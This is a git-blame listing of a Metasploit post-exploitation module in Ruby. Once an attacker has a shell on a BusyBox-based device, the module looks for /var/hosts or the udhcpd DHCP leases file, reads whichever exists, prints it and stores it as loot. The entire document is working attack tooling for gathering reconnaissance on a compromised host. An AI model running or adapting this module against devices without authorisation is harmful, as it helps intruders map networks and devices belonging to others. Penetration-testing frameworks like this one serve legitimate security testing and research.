2015-08-10 16:29:41 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-07 19:19:55 +00:00
|
|
|
class Metasploit3 < Msf::Post
|
2015-08-10 16:29:41 +00:00
|
|
|
|
|
|
|
include Msf::Post::File
|
2015-08-28 16:50:17 +00:00
|
|
|
include Msf::Post::Linux::BusyBox
|
2015-08-10 16:29:41 +00:00
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
2015-08-28 14:53:31 +00:00
|
|
|
'Name' => 'BusyBox Enumerate Host Names',
|
2015-08-28 14:37:18 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module will be applied on a session connected to a BusyBox shell. It will enumerate
|
|
|
|
host names related to the device executing BusyBox.
|
|
|
|
},
|
2015-08-10 16:29:41 +00:00
|
|
|
'Author' => 'Javier Vicente Vallejo',
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Platform' => ['linux'],
|
|
|
|
'SessionTypes' => ['shell']
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2015-08-28 14:37:18 +00:00
|
|
|
print_status('Searching hosts files...')
|
2015-08-28 16:56:12 +00:00
|
|
|
if busy_box_file_exist?('/var/hosts')
|
2015-08-28 14:37:18 +00:00
|
|
|
hosts_file = '/var/hosts'
|
2015-08-28 16:56:12 +00:00
|
|
|
elsif busy_box_file_exist?('/var/udhcpd/udhcpd.leases')
|
2015-08-28 14:37:18 +00:00
|
|
|
hosts_file = '/var/udhcpd/udhcpd.leases'
|
2015-08-10 16:29:41 +00:00
|
|
|
else
|
2015-08-28 14:37:18 +00:00
|
|
|
print_error('Files not found')
|
2015-08-10 16:29:41 +00:00
|
|
|
return
|
|
|
|
end
|
2015-08-28 14:37:18 +00:00
|
|
|
|
|
|
|
read_hosts_file(hosts_file)
|
|
|
|
end
|
|
|
|
|
|
|
|
def read_hosts_file(file)
|
2015-08-10 16:29:41 +00:00
|
|
|
begin
|
2015-08-28 14:37:18 +00:00
|
|
|
str_file=read_file(file)
|
2015-09-06 03:56:11 +00:00
|
|
|
print_good("Hosts file found: #{file}.")
|
2015-08-10 16:29:41 +00:00
|
|
|
vprint_line(str_file)
|
2015-09-06 03:56:11 +00:00
|
|
|
p = store_loot('busybox.enum.hosts', 'text/plain', session, str_file, file, 'BusyBox device host names')
|
2015-08-10 16:29:41 +00:00
|
|
|
print_good("Hosts saved to #{p}.")
|
|
|
|
rescue EOFError
|
2015-08-28 14:37:18 +00:00
|
|
|
print_error("Nothing read from file: #{file}, file may be empty.")
|
2015-08-10 16:29:41 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|